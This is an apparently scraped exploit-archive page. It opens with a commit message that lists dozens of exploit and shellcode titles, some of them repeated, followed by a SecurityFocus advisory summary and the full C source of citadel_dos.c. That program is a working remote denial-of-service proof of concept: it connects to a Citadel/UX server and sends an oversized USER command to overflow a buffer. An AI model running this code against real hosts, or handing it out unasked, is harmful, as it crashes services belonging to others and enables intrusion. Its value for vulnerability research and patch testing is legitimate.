880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
144 lines
No EOL
3.6 KiB
C
144 lines
No EOL
3.6 KiB
C
// source: https://www.securityfocus.com/bid/10833/info
|
|
|
|
A buffer overrun vulnerability is reported for Citadel/UX. The problem occurs due to insufficient bounds checking when processing 'USER' command arguments.
|
|
|
|
An anonymous remote attacker may be capable of exploiting this issue to execute arbitrary code. This however has not been confirmed. Failed exploit attempts may result in a denial of service.
|
|
|
|
----------------- citadel_dos.c -----------------
|
|
/* citadel_dos.c
|
|
*
|
|
* Citadel/UX Remote DoS exploit (Proof of Concept)
|
|
*
|
|
* Tested in Slackware 9.0.0 / 9.1.0 / 10.0.0
|
|
*
|
|
* by CoKi <coki@nosystem.com.ar>
|
|
* No System Group - http://www.nosystem.com.ar
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <errno.h>
|
|
#include <string.h>
|
|
#include <getopt.h>
|
|
#include <netdb.h>
|
|
#include <sys/types.h>
|
|
#include <sys/fcntl.h>
|
|
#include <netinet/in.h>
|
|
#include <sys/socket.h>
|
|
|
|
#define BUFFERSIZE 96+1
|
|
#define ERROR -1
|
|
#define TIMEOUT 3
|
|
#define PORT 504
|
|
|
|
int connect_timeout(int sfd, struct sockaddr *serv_addr,
|
|
socklen_t addrlen, int timeout);
|
|
void use(char *program);
|
|
|
|
int main(int argc, char *argv[]) {
|
|
char buffer[BUFFERSIZE], *p, temp[BUFFERSIZE];
|
|
int sockfd;
|
|
struct hostent *he;
|
|
struct sockaddr_in dest_dir;
|
|
|
|
if(argc != 2) use(argv[0]);
|
|
|
|
p = buffer;
|
|
|
|
printf("\n Citadel/UX Remote DoS exploit (Proof of Concept)\n");
|
|
printf(" by CoKi <coki@nosystem.com.ar>\n\n");
|
|
|
|
memset(p, 'A', 96);
|
|
p += 92;
|
|
*p = '\0';
|
|
|
|
printf(" [+] verifying host:\t");
|
|
fflush(stdout);
|
|
|
|
if((he=gethostbyname(argv[1])) == NULL) {
|
|
herror("Error");
|
|
printf("\n");
|
|
exit(1);
|
|
}
|
|
|
|
printf("OK\n");
|
|
|
|
if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
|
|
perror("Error");
|
|
printf("\n");
|
|
exit(1);
|
|
}
|
|
|
|
dest_dir.sin_family = AF_INET;
|
|
dest_dir.sin_port = htons(PORT);
|
|
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
|
|
bzero(&(dest_dir.sin_zero), 8);
|
|
|
|
printf(" [+] conecting...\t");
|
|
fflush(stdout);
|
|
|
|
if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
|
|
sizeof(struct sockaddr), TIMEOUT) == ERROR) {
|
|
|
|
printf("Closed\n\n");
|
|
exit(1);
|
|
}
|
|
|
|
printf("OK\n");
|
|
|
|
printf(" [+] sending exploit...\t");
|
|
fflush(stdout);
|
|
|
|
recv(sockfd, temp, sizeof(temp), 0);
|
|
send(sockfd, "USER ", 5, 0);
|
|
send(sockfd, buffer, strlen(buffer), 0);
|
|
send(sockfd, "\n", 1, 0);
|
|
close(sockfd);
|
|
|
|
printf("OK\n\n");
|
|
}
|
|
|
|
int connect_timeout(int sfd, struct sockaddr *serv_addr,
|
|
socklen_t addrlen, int timeout) {
|
|
|
|
int res, slen, flags;
|
|
struct timeval tv;
|
|
struct sockaddr_in addr;
|
|
fd_set rdf, wrf;
|
|
|
|
fcntl(sfd, F_SETFL, O_NONBLOCK);
|
|
|
|
res = connect(sfd, serv_addr, addrlen);
|
|
|
|
if (res >= 0) return res;
|
|
|
|
FD_ZERO(&rdf);
|
|
FD_ZERO(&wrf);
|
|
|
|
FD_SET(sfd, &rdf);
|
|
FD_SET(sfd, &wrf);
|
|
bzero(&tv, sizeof(tv));
|
|
tv.tv_sec = timeout;
|
|
|
|
if (select(sfd + 1, &rdf, &wrf, 0, &tv) <= 0)
|
|
return -1;
|
|
|
|
if (FD_ISSET(sfd, &wrf) || FD_ISSET(sfd, &rdf)) {
|
|
slen = sizeof(addr);
|
|
if (getpeername(sfd, (struct sockaddr*)&addr, &slen) == -1)
|
|
return -1;
|
|
|
|
flags = fcntl(sfd, F_GETFL, NULL);
|
|
fcntl(sfd, F_SETFL, flags & ~O_NONBLOCK);
|
|
|
|
return 0;
|
|
}
|
|
|
|
return -1;
|
|
}
|
|
|
|
void use(char *program) {
|
|
printf("Use: %s <host>\n", program);
|
|
exit(1);
|
|
} |